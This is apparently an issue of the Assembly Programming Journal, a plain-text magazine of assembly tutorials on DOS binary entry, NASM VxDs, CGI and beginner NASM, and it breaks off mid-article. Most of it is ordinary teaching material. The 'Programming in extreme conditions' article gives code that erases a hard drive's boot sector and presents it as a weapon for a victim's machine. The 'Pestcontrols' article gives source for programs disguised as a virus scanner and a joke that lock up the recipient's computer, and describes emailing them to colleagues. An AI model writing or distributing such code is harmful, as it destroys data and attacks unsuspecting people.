APJ issue coming from beyond the grave! Thanks to Tiago for taking this
over.
_m
_________________________________________________________________
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::. Sep 00-Aug
01
:::\_____\::::::::::. Issue
9
::::::::::::::::::::::.........................................................
A S S E M B L Y P R O G R A M M I N G J O U R N A L
http://asmjournal.freeservers.comasmjournal@...
T A B L E O F C O N T E N T S
----------------------------------------------------------------------
Introduction.............................................Tiago.Sanches
"Programming in extreme conditions".......................Kalmykov.b52
"Pestcontrols"...........................................Jan.Verhoeven
Column: Win32 Assembly Programming
"How to write VxDs using NASM".............................therain
"Common Gateway Interface using PE console apps"....Michael.Pruitt
Column: The Unix World
"Writing A Useful Program With NASM".................Jonathan.Leto
"Command Line in FreeBSD".........................G.Adam.Stanislav
"Compressing data"...................................Feryno.Gabris
Column: PalmOS Environment
"Hello Tiny World"..........................................Latigo
Column: Gaming Corner
"Win32 ASM Game Programming - Part 2"..................Chris.Hobbs
Column: Assembly Language Snippets
"Basic trigonometry functions"....................Eoin.O'Callaghan
"getpass"................................................Jake.Bush
"strcmp".................................................Jake.Bush
"strlwr".................................................Jake.Bush
"strupr".................................................Jake.Bush
Column: Issue Solution
"Exact Pattern Matching Algorithms"...............Steve.Hutchesson
"Binary String Search Algorithm".........................buliaNaza
----------------------------------------------------------------------
+++++++++++++++++++Issue Challenge++++++++++++++++++
Code a fast pattern matching algorithm
----------------------------------------------------------------------
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::..............................................INTRODUCTION
by Tiago
Sanches
Finally, issue 9 is out!
After a long, long time APJ is back. What happened?
Well, mainly due to mammon_'s lack of free time to handle everything
concerning
the journal by himself and whatnot (which may have led to a shortage of
contributions), APJ had to be discontinued as of last year. The good news
are
that the journal is back, many people have volunteered to help out and so in
the future a staff may actually be a reality, allowing things to run
smoother
than they have. On a side note, mammon_ is still administrating the journal,
even if time constraints don't allow him to get as involved in its
management
as before.
Anyway, about this issue, there are articles ranging from CGI programming,
written by Michael Pruitt, to the continuation of Chris Hobbs' gaming series
(that Chili prepared for ASCII distribution). A new column has also been
created, concerning the emerging PalmOS platform, featuring a very good
introductory article by Latigo.
G. Adam Stanislav contributed another article for the Unix side, along with
Feryno Gabris, who presents an ELF compressor, whose text may look somewhat
cryptic at first if not for the source code provided, both NASM oriented.
Also
for NASM, therain shows how to write VxDs and Jonathan Leto provided an
article
for the beginning assembly programmer.
To close the list is a "back to the stone age" low-level programming article
by
Kalmykov.b52 for when everything you have is MS-DOS and, lastly, it's Jan
Verhoeven's payback day as he says: "This time the joke is on you!".
All in all this issue is packed with very good articles, not mentioning the
great trigonometry macros by Eoin O'Callaghan in the snippets section, as
well
as some other pieces of code from Jake Bush and at the end the issue
challenge
that this time focuses on pattern matching algorithms, featuring a great
work
done by Steve Hutchesson along with code presented by buliaNaza.
Just a reminder for contributers on submission guidelines: articles must be
written in English and may focus on any aspect of assembly language for any
level of programming, but remember that they must be in ASCII text format.
Here
are some rules to follow:
- lines should have a maximum of 80 characters (including the 'New Line'
character), with no left or right margins.
- article subsections should consist of a subsection name, a following
line
of hyphens to underscore and be preceded by two carriage returns.
- Paragraphs should not be indented and must be seperated by a blank
line.
- Code indentation (opcodes) should be about 8 chars.
- Don't use TABs, use spaces instead!
That said, remember to supply a name or handle and a title for the article
and
check the contents of the current issue for a general idea of the magazine's
format. You can mail the articles, snippets or any other contribution to me
at:
sanches@...
Hopefully, with your help, issue 10 will be out faster than this one and the
journal can start being released on a regular basis again.
As mammon_ would say, enjoy the mag!
Tiago Sanches
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Programming in extreme
conditions
by Kalmykov.b52
INTRODUCTION
------------
What is 'extreme conditions' ? When you are sitting in front of a computer
with
only MS-DOS installed without any compilers, hex editors, shells, debuggers
and
you need to recover lost data, delete virus, or write a new one. This is an
extreme conditions. Most of programmers won't be able to do anything, most
of
administrators think that this computer is 100% secured. But this won't stop
the assembler programmer ...
I have chosen pure MS-DOS as the operation system to program for because in
Windows there are many things that will easier this task (e.g. in Windows 98
there is-built in browser with VBScript and Java Script interpretators so
you
can easy write a hex-editor and more).
This article will be interesting as for the beginners and experienced
programmers. Also I recommend it to hackers, administrators, and anybody who
wants to feel the spirit of low-level programming, which now is disappearing
with the previous programmers generation generation.
THE BEGINNING
-------------
To read and understand this you will need this minimum: the knowledge of
Assembler, experience working with MS-DOS. Also you will need the list of
x86
instructions opcodes, ASCII table, and lot of free time. First of all, we
need
some kind of text editor. But the administrator removed EVERYTHING that
could
help us. There is only one thing that differs a good programmer from any
other-
It's the deep knowledge of everything he works with. If works with DOS he
knows
everything about it. There is undocumented functions that opens a tiny text
editor, but that's enough. Enter this DOS command:
C:\copy con test.com
You will run the text editor. This is our instrument. But we still don't
know
how to write binaries. If you will look to official MS-DOS manual, you'll
find
the answer. Using ALT key and the numeric keyboard you can create binaries.
First of all check if the NUMlock is on. Now press ALT, type 195, now
release
ALT. To save file and exit press CTRL-Z and hit enter. Now run it. It
doesn't
do anything but it doesn't halt the system. If you disassemble it you will
find
that test.com consists of only one operand RETN. As you already guessed
opcode
of RETN (195 == 0xC3), and in decimal it is 195.
ADVANCED
--------
Well, It was easy. Now try to enter this:
ALT-180 ALT-09 ALT-186 ALT-09 ALT-01 ALT-205 ! ALT-195 ALT 32 Hi,world!$
Than press CTRL-Z and hit enter. It is clear that this program that prints
"Hi,world!". Let's disassemble it:
49E0:0100 start:
49E0:0100 B4 09 mov ah,9
49E0:0102 BA 0109 mov dx,offset data_1
49E0:0105 CD 21 int 21h ; DOS Services
; ah=function 09h
; display char
; string at ds:dx
49E0:0107 C3 retn
49E0:0108 20 db 20h
49E0:0109 48 69 20 21 21 21 data_1 db 'Hi,world!$
; xref 49E0:0102
I hope you know about the reversed order in machine word (ALT-09 ALT-01 =
109).
Also, in order to show the beauty of this method, I used symbol '!' == 0x21
to
call interrupt 0x21. So knowing ASCII codes can easier your life. But why we
need this symbol (20h == ALT-32 == " ") at 49E0:0108 ?
This is the main problem of this method. Using ALT and numeric keyboard we
cannot enter some symbols. Here is a list of them:
0,3,6,8,16(0x10),19(0x13),27(0x1b),255(0xFF)
You will need to avoid this symbols. If you look at the code, you'll see
that
the real offset is 0x108. After adding a symbol the offset became 0x109.
Actually there is more elegant way to do it:
mov dx,109
dec sx
These two variants are equal (dec dx == 1 byte) and you chose what suits you
best. Another problem is finding offset of variables and labels. You can
write
program on the paper, giving to variables symbolic names, and then the
program will be ready it will be easy to find necessary offsets and address.
Another possibility is declaring all variables before their usage:
mov ah,9
jmp sort $+20
db 'Hi,world!'$
mov dx,0x100+2+2; 0x100 - the base adress,2 - lengh of
; mov ah,9, 2 - lengh of jmp
jmp short $+20 - reserves 20 bytes for the string. This method could be also
used for labels.
THE EXAMPLE
-----------
I think you are tired of these theoretical programming and feel ready to see
this method in work. As illustration we will to create a program that erases
the boot sector. Attention ! The usage of this program in order to destroy
information is a crime. You should use it only for experimental purpose.
First of all, let's write it on assembler:
B80103 mov ax,00301
B90100 mov cx,00001
BA8000 mov dx,00080
CD13 int 013
C3 retn
As you see we have one #0 and two #3. Let's modify the program to avoid
them:
xor ax,ax
mov ds,ax
mov ax,00299
inc ax
inc ax
xor cx,cx
inc cx
mov dl,80
mov bx,13h*4
pushf
cli
push cs
call dword ptr [bx]
retn
Maybe it's quite a hard example. The assembler programming and interrupts
are not really the subject of this article. I can only forward you to the
other
references that you can easily find on the Internet. Fortunately
(or unfortunately, depends on readers orientation), in BIOS there is a boot
write protection (sometimes it's called "Virus warning").It will block any
efforts to modify the main boot sector.
For example, running this program under Windows 98 operation system will
take
no effect. But we still can work with hard drive I/O ports on a low-level.
Here is an example of program that will erase main boot sector, through hard
drive I/O ports:
mov dx, 1F2h
mov al,1
out dx,al
inc dx
out dx,al
inc dx
xor ax,ax
out dx,al
inc dx
out dx,al
mov al, 10100000b
inc dx
out dx,al
inc dx
mov al,30h
out dx,al
lea si, Buffer
mov dx, 1F0h
mov cx, 513
rep outsw
I don't know any popular protection that can track and block that program.
However, that doesn't refer to Windows NT, this OS won't allow any program
without necessary privileges to work with ports, even more it will close
the application's window. Preparing this example for entering it using ALT
and optimizing It's size I will leave as an exercise to the readers.That's
all:
enter this in victims machine and you have powerful weapon. I recommend to
use
it very carefully.
ENDING
------
It's not easy. All this requires a lot of experience and talent but gives
you
incredible power on machine(and i hope you won't be using this power for
destruction). All this looks quite unuseful, you can say that you won't need
it - but who knows?.. Nowdays programmer depends on the powerfull
development
tools (compilers, debuggers, editors) and when he stay alone with 'nature'
he cannot control the situation anymore - he cannot control the machine ...
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Pestcontrols
by Jan
Verhoeven
Are you plagued now and then by friends and relatives who send you funny
pictures (mostly with a lot of "beneath the belt content") via E-mail?
I used to have them. I got rid of these pests.
How I did it? I sent back some nice programs. And if they run Outlook
Express,
they can't resist to open the attachment.
What I do is NOT make a virus. It is at best a trojan horse, but in fact it
doesn't even come close to a trojan. No harm is done (intentionaly) unless
the
victim is a real moron and starts an unknown executable.
Pestcontrol 1: the virus scanner
--------------------------------
Most of the afore mentioned morons know of the exsitence of virus scanners.
So
they will be more than eager to try out the latest one, especially if it is
as
compact as this one:
name scan
lf equ 10
cr equ 13
mov dx, offset text
mov ah, 9
int 021 ; show some message
back: cli ; disable keyboard etc
jmp back ; and do it again
mov ax, 04C00 ; by the time pigs can fly, ...
int 021 ; ... the program is halted.
text db 'Scanning your system....', cr, lf
db 'Please wait a minute. $'
db 1023 dup (073)
Yes, you are right, this COM file is something like 1 Kb in size. You can
easily control the size by adjusting the value in the last line. Make sure
to
remain well under the 64K limit else the file cannot be a COM file anymore
and
there is a chance that a wraparound will occur in which you main routine
will
be overwritten.
I hesitate to explain the program. It's so damned simple. In part 1 the
message
is printed to the screen. In part 2 the computer is crippled and in part 3
the
program returns to the command interpreter, only this point is never
reached.... :o)
Believe me: people will wait HOURS before they get worried and try to
Alt-Ctrl-Del themselves a way out of this problem. Only to find out that
their
efforts are in vain.
If this program is run from within a DOS box under WIndows, and the user had
a
lot of other tasks open, he will loose any unsaved work. And if he or she is
on
a network, it may be crippled as well.
So be a little bit careful who you treat to this attachment.....
Pestcontrol 2: something funny
------------------------------
We all like jokes, don't we? So we send eachother large breasted foto's and
such. I have a joke to send back to these persons. It's a real funny
program,
believe me. And efficient.
name funny
cli ; disable keyboard and interrupts
cld ; make sure we move upwards
mov ax, 0A000 ; point to start of VGA pixel RAM
mov es, ax
mov ds, ax
L1: cli ; INT's off again, just in case...
mov cx, 08000
mov ax, 0
mov di, ax
mov si, ax
L0: cli ; did I turn of INT's?
lodsw ; fetch word from VGA screen
xor ax, ax ; clear it
stosw ; and store it
loop L0 ; loop back to CLI instruction
cli ; and turn off interrupts
jmp L1 ; before jumping back to the CLI.
db 22K dup ('Í ') ; add some more muscles.
This is a real nasty program. One of the guys at work (two windows away from
my
place; I could see the results...) had been sending me several 500 Kb
funnies.
I asked him to remove me from his mailing but he didn't listen. So I shot
back
(hey, it was self defence!).
The first part of the program kills the keyboard and other interrupts,
whereas
the second part plays a nasty trick on the user screen. I assume the user is
running Windows on a VGA screen.... It keeps on pumping ZERO's into display
memory in a loop that's almost impossible to stop. If the CPU would manage
to
enable interrupts again it will loose control after another few nanoseconds
(on
modern CPU's) or microseconds (on older ones).
The result is devastating: they run the FUNNY.EXE (if there is no MZ in the
exe-header, the program is considered a COM file) and the screen turns black
immediately and they loose all control of the machine. The three fingered
salute will not help. The only option is to pull the plug.
This executable did the trick. Four requests to relieve me from his mail
assaults did not work. One counterattack with my Funny Exe was effective
immediately.
Afterthoughts
-------------
Yes, these programs are nasties. They should NOT be copied or used too soon.
On
the other hand, Windows is so clumsily programmed (there should be IO
Privileges on task switching instructions like IN, OUT and CLI but there
aren't) that it enables malicious software to cause the effects they do.
Reminder
--------
The code published here is GNU GPL. Don't try this at home.
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::................................WIN32.ASSEMBLY.PROGRAMMING
How to write VxDs using
NASM
by therain
I. About the readers and article's files overview
II. MASM vs NASM : Syntax overview
III. A skeleton VxD
IV. More VxD examples
V. FAQs
VI. About the writer
I. About the readers and article's files overview
-------------------------------------------------
This article is aimed at the user that already does little Virtual Device
Driver (VxD) progamming using Microsoft's Macro Assembler (MASM). It will
only
cover how to use the Net Wide Assembler (NASM) to write Virtual Device
Drivers
and not how to learn VxD programming using NASM.
It is also suggested that the user be familiar with NASM or read NASM DOC.
As for the files in this article:
NASMVXD.TXT - This article.
VXDN.INC - Contains VxD related definitions and macros for NASM.
WINDDK.INC - This is used by VXDN.INC and should'nt be directly
included
by you. It contains VxD related EQU's and it also has
VxD
services covering VMM,Shell,Debug,...
II. Overview about MASM & NASM
------------------------------
It is time to mention that NASM was never intended to produce VxD files and
you
won't be able to produce any without the include files from this package and
without Microsoft's Incremental Linker (LINK.EXE).
Okay, now the syntax differences between MASM & NASM.
Processor Mode:
---------------
To enable the use of 386+ protected mode instructions you used to put a
'.386p'
in MASM, no need for that in NASM, however you have to explicitly set the
default bitness to 32 via the 'BITS 32' directive (and to 16 in the real
mode
initialization segment).
MASM: .386p
NASM: BITS 32
Segments specification:
-----------------------
MASM has lot of segments declaration macros unlike NASM in which you have to
name the segment as you stated it in the .DEF file.
The 5 basic segment definition macros are:
MASM: NASM: Description
----- ----- -----------
VxD_CODE_SEG/ENDS segment _LTEXT Protected mode code seg.
VxD_DATA_SEG/ENDS segment _LDATA Protected mode data seg.
VxD_ICODE_SEG/ENDS segment _ITEXT Protected mode initialization
code segment. (usually
optional)
VxD_IDATA_SEG/ENDS segment _IDATA Protected mode initialization
data segment. (usually
optional)
VxD_REAL_INIT_SEG/ENDS segment _RTEXT Real mode initialization
segment. (optional too)
Notice that NASM does not need a segment closing macro unlike MASM.
To start a new segment just declare it like 'segment _LTEXT' and everything
after that line will go to that segment.
Please do not use the intrinsic form of the segment macro (e.g.
[segment _LTEXT]) as certain VxD macros rely on saving/restoring the current
segment and they would fail should you use the intrinsic form.
Check the FAQ for a brief segment overview or NASMDOC.TXT for full overview.
Virtual Device Desciptor Block (DDB) Declaration:
-------------------------------------------------
MASM:
-----
Declare_Virtual_Device Name, MajorVer, MinorVer, CtrlProc, DeviceNum,
InitOrder, V86Proc, PMProc, RefData
NASM:
-----
Due to the fact that NASM does not support string concatenation in
macros
yet (there exist patched versions which do), the declaration is a bit
different:
Declare_Virtual_Device Name, 'Name', MajorVer, MinorVer, CtrlProc,
DeviceNum, InitOrder, V86Proc, PMProc, RefData
Params 5 to 9 are optional, since most of the time they are generic (not
used).
The extra parameter is 'Name' which will become the DDB_Name field in
the
DDB (this is the name by which the VxD will be known to the VMM), Name
itself determines the name for the Control Procedure and the Service
Table
(if used).
The DDB must be declared inside the _LDATA segment.
Example:
segment _LDATA
Declare_Virtual_Device SAMPVXD1, 'SAMPVXD1', 1, 0, SAMPVXD1_Control
Control Procedure Definition:
-----------------------------
MASM:
-----
Begin_Control_Dispatch NAME
Control_Dispatch Message,Proc
End_Control_Dispatch
NASM:
-----
This will be a little new for you since you have to do it by hand and
not
by similar macros:
segment _LTEXT
VXDNAME_Control:
cmp eax,VM_INIT
je OnVmInit
cmp eax,W32_DEVICEIOCONTROL
je OnDIOC
cmp eax,<system message>
je <Desired Event handler proc>
clc ; At any time during initialization, a virtual device can set
the
; carry flag and return to the VMM to prevent the virtual
device
; from loading. This means that the carry flag must be cleared
to
; allow loading.
retn
OnVmInit:
; Do some code
ret
OnDIOC: ; OnDeviceIoControl
; ESI points to a DIOCParams struct
cmp word [esi+DIOCParams.dwIoControlCode],MY_DIOC_CODE
je domycode
retn ; Don't forget to put a return as you're used to put a
; "EndProc procname"
Any Other procedure Definition
------------------------------
Using NASM's normal procedure definition you can define a new proc as
usual: "procname :".
As for calling conventions you have to access the stack yourself or use some
other NASM macros.
Using VxdCall and VMMCall
-------------------------
In NASM you can call: VMMCall Service,param1,{param2},[ [{]param3[}] ],....
III. A skeleton VxD
--------------------
A skeleton VxD will be a very basic VxD enough to be loaded correctly and do
nothing more than taking up memory. =)
In NVXDSKEL.DEF you can specify if it will be a DYNAMIC or a STATIC VxD
like:
VXD MYVXD DYNAMIC ; dynamic vxd
VXD MYVXD ; static vxd
NVXDSKEL.DEF
------------
VXD NVXDSKEL DYNAMIC
SEGMENTS
_LTEXT CLASS 'LCODE' PRELOAD NONDISCARDABLE
_LDATA CLASS 'LCODE' PRELOAD NONDISCARDABLE
_TEXT CLASS 'LCODE' PRELOAD NONDISCARDABLE
_DATA CLASS 'LCODE' PRELOAD NONDISCARDABLE
CONST CLASS 'LCODE' PRELOAD NONDISCARDABLE
_ITEXT CLASS 'ICODE' DISCARDABLE
_IDATA CLASS 'ICODE' DISCARDABLE
_PTEXT CLASS 'PCODE' NONDISCARDABLE
_PDATA CLASS 'PDATA' NONDISCARDABLE SHARED
_STEXT CLASS 'SCODE' RESIDENT
_SDATA CLASS 'SCODE' RESIDENT
_DBOSTART CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING
_DBOCODE CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING
_DBODATA CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING
_RCODE CLASS 'RCODE'
EXPORTS
NVXDSKEL_DDB @1
NVXDSKEL.ASM
------------
bits 32
%include "vxdn.inc"
segment _LDATA
Declare_Virtual_Device NVXDSKEL,'NVXDSKEL',1,0,NVXDSKEL_Control
segment _LTEXT
NVXDSKEL_Control:
clc
retn
Assembling and linking:
-----------------------
* To assemble you must have NASM v0.98+
NASM NVXDSKEL.ASM -f win32
LINK NVXDSKEL.OBJ /VXD /DEF:NVXDSKEL.DEF
That's it!
IV. More VxD examples
---------------------
This example will show the use of VMMCall and VxDCall
VXDSAMP1.DEF
------------
VXD VXDSAMP1 DYNAMIC
SEGMENTS
_LTEXT CLASS 'LCODE' PRELOAD NONDISCARDABLE
_LDATA CLASS 'LCODE' PRELOAD NONDISCARDABLE
_TEXT CLASS 'LCODE' PRELOAD NONDISCARDABLE
_DATA CLASS 'LCODE' PRELOAD NONDISCARDABLE
CONST CLASS 'LCODE' PRELOAD NONDISCARDABLE
_ITEXT CLASS 'ICODE' DISCARDABLE
_IDATA CLASS 'ICODE' DISCARDABLE
_PTEXT CLASS 'PCODE' NONDISCARDABLE
_PDATA CLASS 'PDATA' NONDISCARDABLE SHARED
_STEXT CLASS 'SCODE' RESIDENT
_SDATA CLASS 'SCODE' RESIDENT
_DBOSTART CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING
_DBOCODE CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING
_DBODATA CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING
_RCODE CLASS 'RCODE'
EXPORTS
VXDSAMP1_DDB @1
VXDSAMP1.ASM
------------
bits 32
%include "vxdn.inc"
segment _LDATA
Declare_Virtual_Device VXDSAMP1,'VXDSAMP1',1,0,VXDSAMP1_Control
segment _LTEXT
VXDSAMP1_Control:
cmp eax,W32_DEVICEIOCONTROL
je OnDIOC
clc
retn
OnDIOC:
cmp dword [esi+DIOCParams.dwIoControlCode],1
je .1
xor eax,eax
jmp .ret
.1:
VMMCall Get_Sys_VM_Handle
xor esi,esi ; no callback
xor edx,edx ; no ref data for callback
mov eax,0
mov ecx,Msg
mov edi,Title
VxDCall SHELL_Message
.ret:
retn
segment _LDATA
Msg db 'Hello world!',0
Title db 'Title!',0
<EOF>
And another example that calls Int21/Ah=02,dl=7 to beep.
VXDSAMP2.ASM
------------
bits 32
%include "vxdn.inc"
segment _LDATA
Declare_Virtual_Device VXDSAMP2,'VXDSAMP2',1,0,VXDSAMP2_Control
segment _LTEXT
VXDSAMP2_Control:
cmp eax,W32_DEVICEIOCONTROL
je OnDIOC
clc
retn
OnDIOC:
cmp dword [esi+DIOCParams.dwIoControlCode],1
je .1
xor eax,eax
jmp .ret
.1:
VxDCall Begin_Nest_V86_Exec
mov word [ebp+CRS.EAX],0x0200
mov word [ebp+CRS.EDX],0x0007
mov eax,0x21
VxDCall Exec_Int
VxDCall End_Nest_Exec
.ret:
retn
<EOF>
Use .DEF like previous example but change name to the new VxD name.
To test the last two examples, just open the VxD with CreateFileA() and then
issue a DeviceIoControl() with code 1.
V. FAQs
-------
Q) Where can i get NASM and LINK from?
A) As for NASM you can get it from:
http://www.web-sites.co.uk/nasm/
As for LINK.EXE you can get it from the DDK or just download the MASM
Pack
from http://win32asm.cjb.net
Q) How can i add new services and use them with NASM?
A) You can start by defining:
MyDevice_DeviceID equ 0x1234 ; must be word
and then define a service table like:
Begin_Service_Table MyDevice
VMM_Service MyService0 ; 0x0000 ord
VMM_Service MyService1 ; 0x0001 ord
VMM_Service MyServiceN ; ord N
End_Service_Table MyDevice
VI. About the writers
---------------------
Me as therain, would like to credit:
fOSSiL
&
The Owl - For creating VXDN.INC and
for showing how to write VxDs in NASM in the first place
by demonstrating it in IceDump (visit: http://icedump.tsx.org).
And for reviewing/editing this document.
Iczelion - For his awesome win32asm resource site and for his
good VxD tutorials. (visit: http://win32asm.cjb.net)
UKC Team - For their support.
[The VXDN.INC and WINDDK.INC files can be obtained from
http://asmjournal.freeservers.com/files/nasmvxd.zip
where they have been archived along with the text of the article.]
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::................................WIN32.ASSEMBLY.PROGRAMMING
Common Gateway Interface using PE console
apps
by Michael Pruitt
CGI: Tutorial 01: Supplying Dynamic Data to a Web Client
--------------------------------------------------------
In the early '90s the NCSA released HTTPd 1.0 (a web server), a new concept
was
included; CGI. This feature allowed web content to be dynamically generated
on
the server. Up-to-date reports of stocks, scores, and weather were possible
with CGI. Other uses include message boards, guest books, or e-stores.
Typically a CGI application will interface with a Mosaic type web browser;
supplying HTML with the data. When the server recieves a request targeting
a
CGI program, it will lauch the application. Any data from the client will
be
piped to StdIn. The app's StdOut will then be sent back to the client.
Tools Needed
------------
This tutorial is written for FAsm (http://omega.im.uj.edu.pl/~grysztar/). If
you wish to assemble the program, you will need FAsm 1.13.4 (or later) or
you
can translate it to an assembler supporting 80x86 PE console.
For any CGI testing access to a web server is a must. I recommend Apache
1.3.20
(http://httpd.apache.org/). For starting out, you can place your assembled
executable into the \Apache\cgi-bin\ directory. For the server name use
"localhost" (excluding the quotes).
Knowledge of HTML (HyperText Markup Language) is usefull. The basics of HTML
are easy to learn. CSS (Cascading Style Sheets) will prove invaluable if you
use a lot of HTML. A list of books is provided at the end of this article.
A Win32 platform. My system consist of Win 98 SE on a Celeron 433 w/ 128MB
RAM.
Win 95 - NT should work without issues. A Linux box running WINE shoud also
work for those with a strong stomach.
Win32 API
---------
Since everything a CGI application does is non GUI, the kernal32.dll will
suffice for most projects. Database intensive app's will link to other
dll's
to better implement designs.
To access the Standard I/O, will need to use GetStdHandle. Under Win32,
StdIO
is not availiable under predefined handles. ReadFile and WriteFile is used
to
move data. ReadConsole and WriteConsole will not work; file redirection in
not
availiable.
CGI Environment
---------------
A CGI program is not required to read data, but it is required to send it.
Client data is availiable on the StdIn. The length is in the CONTENT_LENGTH
environment variable. Also, 255 bytes of the data is in the QUERY_STRING
EnvVar. All out put must start with "Content-Type:" a space, the type, and
two
newlines (CrLf). Common types include: "text/plain", "text/html", or
"image/gif". Example output:
Content-Type: text/plain
Hello World. Example of HTTP 1.1 header and body.
If you don't write any data, the web server will report with the error:
"Premature end of script headers". If you really don't want to supply data,
you could just write: "Content-Type: text/plain" and two newlines.
The Example Program
-------------------
The program I've supplied writes HTML containing the current date and time.
It
demonstrates use of API's, HTML, data manipulation.
~~~~~~~~~~~~~~~~~~~|||-------------------[code]-------------------|||
format PE console
entry Start
include '\Asm_Win32\Include\_Kernel.inc'
include '\Asm_Win32\Include\macro\stdcall.inc'
include '\Asm_Win32\Include\macro\import.inc'
Cr = 0x0D
Lf = 0x0A
;***---------------------------------------------------------------***
section '.code' code readable executable
Start:
pusha ;Save all of the Registers
stdcall [GetStdHandle], STD_OUTPUT_HANDLE ;Retrive the actual handle
mov [StdOut], eax
cmp eax, INVALID_HANDLE_VALUE ;Error with handle
jz Exit
Get_Time:
stdcall [GetSystemTime], Time ;Load SYSTEMTIME with UTC
call Format_Time ;Convert Hex(bin) to ascii
; and Place into HTML
Write:
stdcall [WriteFile], [StdOut], HTML, HTML._size, HTML.Len, 0
;Write the HTML to StdOut
Exit:
popa ;Restore all of the
Registers
stdcall [ExitProcess], 0
;***-------------------------[Subroutine]--------------------------***
Format_Time:
mov ax, [Time.wYear] ;16b Data
mov edi, HTML.Date_S + 9 ;Ptr to LAST byte of dest
call .ascii ;Convert and place into
HTML
mov ax, [Time.wDay]
mov edi, HTML.Date_S + 4
call .ascii
mov ax, [Time.wMonth]
mov edi, HTML.Date_S + 1
call .ascii
mov edi, HTML.Day_S ;Destination Ptr
mov esi, Day.Wk ;Source Ptr (Array of Days)
xor eax, eax
mov ax, [Time.wDayOfWeek] ;0 <= eax < 7
add esi, eax ;esi =+ eax * 3
add esi, eax ; Indexes the Array
add esi, eax
mov ecx, 3 ;3B per Day String
cld ;Copy Left to Right
rep ; (esi++, edi++)
movsb
mov ax, [Time.wHour]
cmp al, 13 ;Check for PM
jl .wHour
sub al, 12 ;Correct Hour
mov [HTML.Time_S + 9], 'P' ; AM -> PM
.wHour:
mov edi, HTML.Time_S + 1
call .ascii
mov ax, [Time.wMinute]
mov edi, HTML.Time_S + 4
call .ascii
mov ax, [Time.wSecond]
mov edi, HTML.Time_S + 7
call .ascii
ret
;***----------------------[Import Table / IAT]---------------------***
.ascii:
std ;String OPs Right to Left
cmp ax, 10 ;Single Digit?
jl .onex10
and ah, ah ;Only Two Digits
jz .twox16
mov bh, 10 ;Reduce 3x16 to 2x16
div bh ; so that AAM can be used
or ah, 0x30 ;BCD -> ASCII
mov [edi], ah
dec edi
.twox16:
aam ; AH / 10 = AH r AL
or al, 0x30 ;BCD -> ASCII
stosb
mov al, ah
cmp ah, 9
jg .twox16
.onex10:
or al, 0x30
stosb ;Copy Last/Only Digit to
Mem
ret
;***--------------------[Data used by this App]--------------------***
section '.data' data readable writeable
StdIn dd 0 ;Standard I/O Handles
StdOut dd 0
HTML:
db 'Content-type: text/html', Cr, Lf, Cr, Lf
db '<html><head><title>Hello World</title></head>', Cr, Lf
db '<body bgcolor=Black text=Cyan><h1>Hello World</h1>', Cr, Lf
db '<h2><font color=Lime>', Cr, Lf
db 'This HTML is dynamicly generated by a PE console Application writen in'
db '80x86 Assembler</font></h2>', Cr, Lf
db '<h2><font color=Red>It is: </font><font color=Blue>'
.Day_S db 'WkD '
.Date_S db ' 0/00/0000</font> <font color=Magenta>'
.Time_S db ' 0:00:00 AM</font> <font color=Lime>UTC</font></h2>', Cr,
Lf
db '</body></html>', Cr, Lf
HTML._size = $ - HTML - 1
HTML.Len dd 0 ;Number of bytes actually
wrote
Time SYSTEMTIME
Day.Wk db 'SunMonTueWedThuFriSat'
;***----------------------[Import Table / IAT]---------------------***
section '.idata' import data readable writeable
library kernel, 'KERNEL32.DLL'
kernel:
import GetModuleHandle, 'GetModuleHandleA',\
GetCommandLine, 'GetCommandLineA',\
GetSystemTime, 'GetSystemTime',\
GetEnvVar, 'GetEnvironmentVariableA',\
GetStdHandle, 'GetStdHandle',\
CreateFile, 'CreateFileA',\
ReadFile, 'ReadFile',\
WriteFile, 'WriteFile',\
CloseHandle, 'CloseHandle',\
ExitProcess, 'ExitProcess'
__________________|||-------------------[/code]-------------------|||
How to Run
----------
You can run this example from the command line since it requires no client
data. You can also pipe the data into an html doc and open with IE:
Main > Text.html
For the real CGI, place Main.exe into the cgi-bin directory, launch Apache,
and
type "localhost/cgi-bin/Main.exe" in the address box of IE.
References
----------
SAMS Teach Yourself CGI in 24 Hours
SAMS 2000 $24.99US
Rafe Colburn ISBN: 0-672-31880-6
CGI by Example
QUE 1996 $34.99US
Robert Niles & Jeffry Dwight ISBN: 0-7897-0877-9
HTML in Plain English - 2nd Edition
MIS Press 1998 $19.95US
Sandra E. Eddy ISBN: 1-55828-587-3
Cascading Sytle Sheets - The Definitive Guide
O'Reilly 2000 $34.95US
Eric A. Meyer ISBN: 1-56592-622-6
Win32 Programming Reference (Win32 API Help file)
Microsoft 1990-1995 Free
http://win32asm.rxsp.com/files/win32api.zip
Contact
-------
eet_1024@...
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::............................................THE.UNIX.WORLD
Writing A Useful Program With
NASM
by Jonathan Leto
Intro
-----
Much fun can be had with assembly programming, it gives you a much deeper
understanding about the inner workings of your processor and kernel. This
article is geared towards the beginning assembly programmer who can't seem
to
justify why he is doing something as masochistic as writing an entire
program
in assembly language. If you don't already know one or more other
programming
languages, you really have no business reading this. Many constructs will
also
be explained in terms of C. You should also be familiar with the command
line
options of NASM, no sense going over them again here.
Getting Started
---------------
So you want to write a program that actually DOES something. "Hello, world"
isn't cutting it anymore. First, an overview of the various parts of an
assembly program: (For terse documentation, the NASM manual is the place to
go.)
The .data section
-----------------
This section is for defining constants, such as filenames or buffer sizes,
